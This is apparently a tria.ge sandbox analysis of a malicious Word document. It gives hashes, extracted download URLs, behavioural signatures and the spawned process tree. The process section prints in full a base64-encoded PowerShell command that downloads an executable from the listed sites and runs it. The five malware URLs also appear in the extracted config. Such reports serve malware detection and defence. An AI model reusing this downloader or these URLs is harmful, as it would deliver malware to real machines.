Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
137s -
max time network
135s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
28/05/2024, 23:20
Behavioral task
behavioral1
Sample
7ebdfc51b5db238b10845f5779b9861f_JaffaCakes118.doc
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
7ebdfc51b5db238b10845f5779b9861f_JaffaCakes118.doc
Resource
win10v2004-20240508-en
General
-
Target
7ebdfc51b5db238b10845f5779b9861f_JaffaCakes118.doc
-
Size
148KB
-
MD5
7ebdfc51b5db238b10845f5779b9861f
-
SHA1
e8fe96482813fe09819fabdcdc36f6e837c804ca
-
SHA256
6964b98e57e916fabb11b9325e9610748e9154a71cd4a51c3f1eb9f26a3026c3
-
SHA512
4d1d8ece04a893a4f3c89d1765df8f6e418eb1d660261085afd735f9700b5ace18bb631bd8cd04a03fc5580ef642cbb8d9aeb869d106c3e3109bac5609ffc891
-
SSDEEP
3072:l77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qYIdp8CZZyOdyPntYh:l77HUUUUUUUUUUUUUUUUUUUT52VgYCZR
Malware Config
Extracted
http://harazoil.com/wp-content/r7v83/
https://babalublog.com/image/h5jo1ao23800/
http://bigbrushmedia.com/wvvw/aljrz25/
http://blipin.com/vna984247/
http://bmserve.com/mobile/m1z5378/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4764 4336 powErSHell.exe 83 -
Blocklisted process makes network request 5 IoCs
flow pid Process 27 4764 powErSHell.exe 35 4764 powErSHell.exe 38 4764 powErSHell.exe 46 4764 powErSHell.exe 48 4764 powErSHell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 684 WINWORD.EXE 684 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4764 powErSHell.exe 4764 powErSHell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4764 powErSHell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 684 WINWORD.EXE 684 WINWORD.EXE 684 WINWORD.EXE 684 WINWORD.EXE 684 WINWORD.EXE 684 WINWORD.EXE 684 WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7ebdfc51b5db238b10845f5779b9861f_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:684
-
C:\Windows\System32\WindowsPowerShell\v1.0\powErSHell.exepowErSHell -e JAB6ADcANQBfADcAMAAxADMAPQAnAGQAMQAwADUANABfADQANQAnADsAJABuADYANQA1ADkANQA4ADgAIAA9ACAAJwA5ADYAOAAnADsAJABSADMANAA0ADEANgA9ACcAZAA3ADUANgAwAF8AMwA1ACcAOwAkAHQAMABfADUANQA5ADYANAA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAbgA2ADUANQA5ADUAOAA4ACsAJwAuAGUAeABlACcAOwAkAGIAOAA0AF8AMAAyADgANwA9ACcAbgAxADQAOAAxADUAJwA7ACQAegAwADQAMgA3ADkANQA0AD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAagAnACsAJwBlAGMAdAAnACkAIABuAEUAVAAuAHcAZQBgAEIAYwBgAEwASQBFAG4AdAA7ACQAUwA5ADQAXwAwADcAMAAxAD0AJwBoAHQAdABwADoALwAvAGgAYQByAGEAegBvAGkAbAAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHIANwB2ADgAMwAvAEAAaAB0AHQAcABzADoALwAvAGIAYQBiAGEAbAB1AGIAbABvAGcALgBjAG8AbQAvAGkAbQBhAGcAZQAvAGgANQBqAG8AMQBhAG8AMgAzADgAMAAwAC8AQABoAHQAdABwADoALwAvAGIAaQBnAGIAcgB1AHMAaABtAGUAZABpAGEALgBjAG8AbQAvAHcAdgB2AHcALwBhAGwAagByAHoAMgA1AC8AQABoAHQAdABwADoALwAvAGIAbABpAHAAaQBuAC4AYwBvAG0ALwB2AG4AYQA5ADgANAAyADQANwAvAEAAaAB0AHQAcAA6AC8ALwBiAG0AcwBlAHIAdgBlAC4AYwBvAG0ALwBtAG8AYgBpAGwAZQAvAG0AMQB6ADUAMwA3ADgALwAnAC4AUwBQAEwASQB0ACgAJwBAACcAKQA7ACQARgA3ADYANQA3ADMAOQA9ACcAZAAxADUAMQA3ADQAJwA7AGYAbwByAGUAYQBjAGgAKAAkAHQAMAA4ADEANAAxADkAIABpAG4AIAAkAFMAOQA0AF8AMAA3ADAAMQApAHsAdAByAHkAewAkAHoAMAA0ADIANwA5ADUANAAuAGQATwBXAG4AbABvAGEARABmAEkATABFACgAJAB0ADAAOAAxADQAMQA5ACwAIAAkAHQAMABfADUANQA5ADYANAApADsAJABkAF8ANAA0ADIANwA1AD0AJwBKADYANAA4ADYANQA0ACcAOwBJAGYAIAAoACgAJgAoACcARwBlACcAKwAnAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQAdAAwAF8ANQA1ADkANgA0ACkALgBsAEUAbgBHAHQAaAAgAC0AZwBlACAAMwA2ADIAMwA2ACkAIAB7ACYAKAAnAEkAbgB2ACcAKwAnAG8AawAnACsAJwBlAC0ASQB0AGUAJwArACcAbQAnACkAIAAkAHQAMABfADUANQA5ADYANAA7ACQATQAyADIAMgAzADcAXwA9ACcAaQAxADIAOQA4ADMANQAnADsAYgByAGUAYQBrADsAJABHAF8AMQAyAF8AMgA9ACcAdwA2ADIANwAyADMAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUwA0ADYAMAAyADgAMwA1AD0AJwBRADEAOAA3ADUAMQBfAF8AJwA=1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4764
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
262KB
MD551d32ee5bc7ab811041f799652d26e04
SHA1412193006aa3ef19e0a57e16acf86b830993024a
SHA2566230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA5125fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82